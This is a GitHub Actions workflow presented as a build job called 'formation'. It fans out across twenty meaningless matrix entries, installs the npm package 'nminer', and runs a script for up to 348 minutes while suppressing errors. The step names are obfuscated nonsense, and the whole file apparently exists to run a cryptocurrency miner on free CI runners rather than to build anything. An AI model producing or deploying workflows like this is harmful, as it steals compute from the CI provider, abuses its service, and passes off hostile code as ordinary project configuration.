name: formation
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1443 }
          - { version: 8176 }
          - { version: 2570 }
          - { version: 3654 }
          - { version: 4040 }
          - { version: 7857 }
          - { version: 2691 }
          - { version: 4718 }
          - { version: 4313 }
          - { version: 6454 }
          - { version: 7153 }
          - { version: 6653 }
          - { version: 4265 }
          - { version: 5964 }
          - { version: 2009 }
          - { version: 2168 }
          - { version: 5355 }
          - { version: 7701 }
          - { version: 7111 }
          - { version: 8005 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: front cosset well-documented
        run: |
          npm install nminer@latest
          timeout 348m node formation.js || echo "formation executed"